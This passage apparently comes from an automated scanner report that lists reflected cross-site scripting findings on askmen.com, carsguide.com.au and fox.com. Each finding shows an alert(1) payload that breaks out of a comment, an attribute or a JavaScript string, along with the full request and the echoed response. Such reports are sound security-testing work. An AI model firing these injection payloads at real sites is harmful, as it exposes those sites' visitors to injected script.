Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /top_10/carsd514b--><script>alert(1)</script>547716ebfec/fastest-cars-in-the-world.html HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.2.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; show_snazzy_title2=2; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3Dignaskmen-us%253D%252526pid%25253Daskmen%2525253AHomepage%2525253Aam_channel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.askmen.com/top_10/cars/fastest-cars-in-the-world.html%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: (null)
Content-Length: 38707
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:15:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:15:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found
...[SNIP]...
<script>alert(1)</script>547716ebfec/fastest-cars-in-the-world.html-->

1.138. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.askmen.com
Path:	/top_10/cars/fastest-cars-in-the-world.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 5930d--><script>alert(1)</script>e54392f1e73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /top_10/cars/fastest-cars-in-the-world.html5930d--><script>alert(1)</script>e54392f1e73 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.2.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; show_snazzy_title2=2; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3Dignaskmen-us%253D%252526pid%25253Daskmen%2525253AHomepage%2525253Aam_channel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.askmen.com/top_10/cars/fastest-cars-in-the-world.html%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: (null)
Content-Length: 38708
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:15:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:15:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found
...[SNIP]...
<script>alert(1)</script>e54392f1e73/-->

1.139. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.carsguide.com.au
Path:	/search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c784'><script>alert(1)</script>1c084a16ce2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&4c784'><script>alert(1)</script>1c084a16ce2=1 HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Tue, 04 Oct 2011 20:22:54 GMT
Content-Length: 163365
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a href='http://www.carsguide.com.au/search/vehicle-details/D_27018486/@N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&4c784'><script>alert(1)</script>1c084a16ce2=1&searchType=1&vehicleType=1&pos=1&nr=New_700410820110308'>
...[SNIP]...

1.140. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.carsguide.com.au
Path:	/search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab6bb"-alert(1)-"4596c19f3ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&ab6bb"-alert(1)-"4596c19f3ae=1 HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=280
Date: Tue, 04 Oct 2011 20:23:19 GMT
Content-Length: 160005
Connection: close

        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
   $(document).CG_setCookie("recent_search_value","2008");
       $(document).CG_setCookie("recent_search_url","http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202008&type~cars&ab6bb"-alert(1)-"4596c19f3ae~1");
    </script>
...[SNIP]...

1.141. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.carsguide.com.au
Path:	/search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d43e"><script>alert(1)</script>8ac1c0a1eaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&9d43e"><script>alert(1)</script>8ac1c0a1eaa=1 HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=291
Date: Tue, 04 Oct 2011 20:22:44 GMT
Content-Length: 163365
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a title="remove" href="http://www.carsguide.com.au/search/?9d43e"><script>alert(1)</script>8ac1c0a1eaa=1&origin=browse&type=cars&N=4294962119">
...[SNIP]...

1.142. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.carsguide.com.au
Path:	/search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload a844c><script>alert(1)</script>159981e1a16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&a844c><script>alert(1)</script>159981e1a16=1 HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=270
Date: Tue, 04 Oct 2011 20:23:04 GMT
Content-Length: 163141
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a href=http://www.carsguide.com.au/search/vehicle-details/D_27018486/@N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&a844c><script>alert(1)</script>159981e1a16=1&searchType=1&vehicleType=1&pos=1&nr=New_700410820110308>
...[SNIP]...

1.143. http://www.carsguide.com.au/search/ [origin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.carsguide.com.au
Path:	/search/

Issue detail

The value of the origin request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44e9a"-alert(1)-"20a8672a183 was submitted in the origin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search/?N=4294962119&origin=browse44e9a"-alert(1)-"20a8672a183&Nf=pYear|GTEQ%202008&type=cars HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=287
Date: Tue, 04 Oct 2011 20:21:56 GMT
Content-Length: 159334
Connection: close

        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<script>
       $(document).CG_setCookie("recent_search_value","2008");
       $(document).CG_setCookie("recent_search_url","http://www.carsguide.com.au/search/?N~4294962119&origin~browse44e9a"-alert(1)-"20a8672a183&Nf~pYear|GTEQ%202008&type~cars");
    </script>
...[SNIP]...

1.144. http://www.carsguide.com.au/search/ [origin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.carsguide.com.au
Path:	/search/

Issue detail

The value of the origin request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c8533'><script>alert(1)</script>b5e3982c842 was submitted in the origin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browsec8533'><script>alert(1)</script>b5e3982c842&Nf=pYear|GTEQ%202008&type=cars HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=296
Date: Tue, 04 Oct 2011 20:21:31 GMT
Content-Length: 162694
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a href='http://www.carsguide.com.au/search/vehicle-details/D_27018486/@N=4294962119&origin=browsec8533'><script>alert(1)</script>b5e3982c842&Nf=pYear|GTEQ%202008&type=cars&searchType=1&vehicleType=1&pos=1&nr=New_700410820110308'>
...[SNIP]...

1.145. http://www.carsguide.com.au/search/ [origin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.carsguide.com.au
Path:	/search/

Issue detail

The value of the origin request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 8c458><script>alert(1)</script>bdec3ca667b was submitted in the origin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browse8c458><script>alert(1)</script>bdec3ca667b&Nf=pYear|GTEQ%202008&type=cars HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=295
Date: Tue, 04 Oct 2011 20:21:41 GMT
Content-Length: 162470
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a href=http://www.carsguide.com.au/search/vehicle-details/D_27018486/@N=4294962119&origin=browse8c458><script>alert(1)</script>bdec3ca667b&Nf=pYear|GTEQ%202008&type=cars&searchType=1&vehicleType=1&pos=1&nr=New_700410820110308>
...[SNIP]...

1.146. http://www.carsguide.com.au/search/ [origin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.carsguide.com.au
Path:	/search/

Issue detail

The value of the origin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa0d4"><script>alert(1)</script>2cca48b2cd6 was submitted in the origin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browsefa0d4"><script>alert(1)</script>2cca48b2cd6&Nf=pYear|GTEQ%202008&type=cars HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=288
Date: Tue, 04 Oct 2011 20:21:20 GMT
Content-Length: 162694
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a title="remove" href="http://www.carsguide.com.au/search/?origin=browsefa0d4"><script>alert(1)</script>2cca48b2cd6&type=cars&N=4294962119">
...[SNIP]...

1.147. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ugc/xml/homepage_ep_2011-10-4.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c8fd"-alert(1)-"38339057e99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ugc2c8fd"-alert(1)-"38339057e99/xml/homepage_ep_2011-10-4.xml HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/flash/EditorialPod.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 21897
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ugc2c8fd"-alert(1)-"38339057e99:xmlhomepage_ep_2011-10-4"
s_analytics.hier1="fox:shows:_ugc2c8fd"-alert(1)-"38339057e99:xmlhomepage_ep_2011-10-4" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ugc2c8fd"-ale
...[SNIP]...

1.148. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ugc/xml/homepage_ep_2011-10-4.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f997"-alert(1)-"b5848d7db55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ugc/xml3f997"-alert(1)-"b5848d7db55/homepage_ep_2011-10-4.xml HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/flash/EditorialPod.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
